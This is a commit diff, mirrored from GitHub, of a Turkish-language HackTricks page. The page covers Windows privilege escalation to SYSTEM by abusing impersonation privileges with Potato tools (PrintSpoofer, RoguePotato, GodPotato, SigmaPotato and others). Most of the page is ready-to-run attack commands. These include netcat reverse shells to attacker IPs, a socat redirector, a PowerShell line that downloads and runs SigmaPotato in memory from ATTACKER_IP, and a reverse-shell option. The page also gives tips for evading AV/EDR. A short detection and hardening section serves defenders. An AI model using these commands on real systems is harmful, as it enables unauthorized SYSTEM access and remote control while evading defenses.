mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/windows-local-privilege-escalation/ro
This commit is contained in:
parent
41a2c921ce
commit
13f94d609e
@ -2,9 +2,45 @@
|
|||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
> [!WARNING] > **JuicyPotato Windows Server 2019 ve Windows 10 build 1809'dan itibaren çalışmıyor. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM`** düzeyinde erişim sağlamak için kullanılabilir. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) `PrintSpoofer` aracını derinlemesine ele alıyor; bu araç, JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 host'larında taklit ayrıcalıklarını kötüye kullanmak için kullanılabilir.
|
> [!WARNING]
|
||||||
|
> **JuicyPotato artık çalışmıyor** Windows Server 2019 ve Windows 10 build 1809 ve sonrası. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** kullanılabilir **aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesinde erişim elde etmek**. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) `PrintSpoofer` aracını derinlemesine inceliyor; bu araç JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 makinelerinde impersonation ayrıcalıklarını kötüye kullanmak için kullanılabilir.
|
||||||
|
|
||||||
## Hızlı Demo
|
> [!TIP]
|
||||||
|
> 2024–2025'te sıkça bakım yapılan modern bir alternatif SigmaPotato (a fork of GodPotato) olup in-memory/.NET reflection kullanımını ve genişletilmiş OS desteğini ekler. Aşağıda hızlı kullanım ve Referanslar bölümündeki repo'ya bakın.
|
||||||
|
|
||||||
|
Related pages for background and manual techniques:
|
||||||
|
|
||||||
|
{{#ref}}
|
||||||
|
seimpersonate-from-high-to-system.md
|
||||||
|
{{#endref}}
|
||||||
|
|
||||||
|
{{#ref}}
|
||||||
|
from-high-integrity-to-system-with-name-pipes.md
|
||||||
|
{{#endref}}
|
||||||
|
|
||||||
|
{{#ref}}
|
||||||
|
privilege-escalation-abusing-tokens.md
|
||||||
|
{{#endref}}
|
||||||
|
|
||||||
|
## Gereksinimler ve yaygın tuzaklar
|
||||||
|
|
||||||
|
Aşağıdaki tüm teknikler, aşağıdaki ayrıcalıklardan birine sahip bir bağlamdan impersonation yeteneği olan ayrıcalıklı bir servisi kötüye kullanmaya dayanır:
|
||||||
|
|
||||||
|
- SeImpersonatePrivilege (en yaygın) veya SeAssignPrimaryTokenPrivilege
|
||||||
|
- Token zaten SeImpersonatePrivilege içeriyorsa yüksek bütünlük (High integrity) gerekmez (IIS AppPool, MSSQL gibi birçok servis hesabı için tipiktir).
|
||||||
|
|
||||||
|
Ayrıcalıkları hızlıca kontrol edin:
|
||||||
|
```cmd
|
||||||
|
whoami /priv | findstr /i impersonate
|
||||||
|
```
|
||||||
|
Operasyonel notlar:
|
||||||
|
|
||||||
|
- PrintSpoofer, Print Spooler servisinin çalışıyor olmasını ve yerel RPC endpoint'i (spoolss) üzerinden erişilebilir olmasını gerektirir. PrintNightmare sonrası Spooler'ın devre dışı bırakıldığı sertleştirilmiş ortamlarda RoguePotato/GodPotato/DCOMPotato/EfsPotato'yu tercih edin.
|
||||||
|
- RoguePotato, TCP/135 üzerinden erişilebilir bir OXID resolver gerektirir. Egress engelliyse bir redirector/port-forwarder kullanın (aşağıdaki örneğe bakın). Eski sürümler -f flag'ini gerektiriyordu.
|
||||||
|
- EfsPotato/SharpEfsPotato MS-EFSR'i kötüye kullanır; eğer bir pipe engellenmişse, alternatif pipe'ları deneyin (lsarpc, efsrpc, samr, lsass, netlogon).
|
||||||
|
- RpcBindingSetAuthInfo sırasında görülen 0x6d3 hatası genellikle bilinmeyen/desteklenmeyen RPC kimlik doğrulama servisini gösterir; farklı bir pipe/transport deneyin veya hedef servisin çalıştığından emin olun.
|
||||||
|
|
||||||
|
## Quick Demo
|
||||||
|
|
||||||
### PrintSpoofer
|
### PrintSpoofer
|
||||||
```bash
|
```bash
|
||||||
@ -21,12 +57,24 @@ c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
|
|||||||
NULL
|
NULL
|
||||||
|
|
||||||
```
|
```
|
||||||
|
Notlar:
|
||||||
|
- -i ile mevcut konsolda etkileşimli bir süreç başlatabilir veya -c ile tek satırlık bir komut çalıştırabilirsiniz.
|
||||||
|
- Spooler servisi gerektirir. Devre dışıysa, bu başarısız olur.
|
||||||
|
|
||||||
### RoguePotato
|
### RoguePotato
|
||||||
```bash
|
```bash
|
||||||
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
|
||||||
# In some old versions you need to use the "-f" param
|
# In some old versions you need to use the "-f" param
|
||||||
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
||||||
```
|
```
|
||||||
|
Eğer outbound 135 engelliyse, redirector'ınızda socat ile OXID resolver'ı pivotlayın:
|
||||||
|
```bash
|
||||||
|
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
|
||||||
|
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
|
||||||
|
|
||||||
|
# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
|
||||||
|
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
|
||||||
|
```
|
||||||
### SharpEfsPotato
|
### SharpEfsPotato
|
||||||
```bash
|
```bash
|
||||||
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
||||||
@ -63,16 +111,51 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
|
|||||||
|
|
||||||
nt authority\system
|
nt authority\system
|
||||||
```
|
```
|
||||||
|
İpucu: Eğer bir pipe başarısız olursa veya EDR bunu engellerse, diğer desteklenen pipes'leri deneyin:
|
||||||
|
```text
|
||||||
|
EfsPotato <cmd> [pipe]
|
||||||
|
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
|
||||||
|
```
|
||||||
### GodPotato
|
### GodPotato
|
||||||
```bash
|
```bash
|
||||||
> GodPotato -cmd "cmd /c whoami"
|
> GodPotato -cmd "cmd /c whoami"
|
||||||
# You can achieve a reverse shell like this.
|
# You can achieve a reverse shell like this.
|
||||||
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||||
```
|
```
|
||||||
|
Notes:
|
||||||
|
- SeImpersonatePrivilege mevcut olduğunda Windows 8/8.1–11 ve Server 2012–2022 genelinde çalışır.
|
||||||
|
|
||||||
### DCOMPotato
|
### DCOMPotato
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
|
DCOMPotato, varsayılan olarak RPC_C_IMP_LEVEL_IMPERSONATE olan servis DCOM nesnelerini hedefleyen iki varyant sağlar. Sağlanan ikili dosyaları derleyin veya kullanın ve komutunuzu çalıştırın:
|
||||||
|
```cmd
|
||||||
|
# PrinterNotify variant
|
||||||
|
PrinterNotifyPotato.exe "cmd /c whoami"
|
||||||
|
|
||||||
|
# McpManagementService variant (Server 2022 also)
|
||||||
|
McpManagementPotato.exe "cmd /c whoami"
|
||||||
|
```
|
||||||
|
### SigmaPotato (güncellenmiş GodPotato fork'ı)
|
||||||
|
|
||||||
|
SigmaPotato, .NET reflection aracılığıyla bellek içi yürütme ve bir PowerShell reverse shell yardımcısı gibi modern kolaylıklar ekler.
|
||||||
|
```powershell
|
||||||
|
# Load and execute from memory (no disk touch)
|
||||||
|
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
|
||||||
|
[SigmaPotato]::Main("cmd /c whoami")
|
||||||
|
|
||||||
|
# Or ask it to spawn a PS reverse shell
|
||||||
|
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
|
||||||
|
```
|
||||||
|
## Tespit ve sertleştirme notları
|
||||||
|
|
||||||
|
- İzleyin: named pipes oluşturan ve hemen token-duplication APIs çağırıp CreateProcessAsUser/CreateProcessWithTokenW ile devam eden süreçleri. Sysmon faydalı telemetri sağlayabilir: Event ID 1 (process creation), 17/18 (named pipe created/connected), ve SYSTEM olarak çocuk süreçler başlatan komut satırları.
|
||||||
|
- Spooler hardening: Print Spooler servisinin gerekmediği sunucularda devre dışı bırakılması, spoolss aracılığıyla PrintSpoofer-style yerel coercions'u engeller.
|
||||||
|
- Service account hardening: SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege atamasını özel servislere mümkün olduğunca sınırlayın. Servisleri gerekirse en az gerekli ayrıcalıkla virtual accounts altında çalıştırmayı ve mümkünse service SID ile izole edip write-restricted tokens kullanmayı değerlendirin.
|
||||||
|
- Network controls: Çıkış TCP/135'i engellemek veya RPC endpoint mapper trafiğini kısıtlamak, dahili bir redirector yoksa RoguePotato'yu bozabilir.
|
||||||
|
- EDR/AV: Bu araçların tümü yaygın şekilde signature'lanmıştır. Recompiling from source, renaming symbols/strings, veya in-memory execution kullanmak tespiti azaltabilir ama sağlam behavioral detections'ı yenmez.
|
||||||
|
|
||||||
## Referanslar
|
## Referanslar
|
||||||
|
|
||||||
- [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
|
- [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
|
||||||
@ -82,5 +165,7 @@ nt authority\system
|
|||||||
- [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
- [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||||
- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
|
- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
|
||||||
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
|
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
|
||||||
|
- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
|
||||||
|
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
|
||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
Loading…
x
Reference in New Issue
Block a user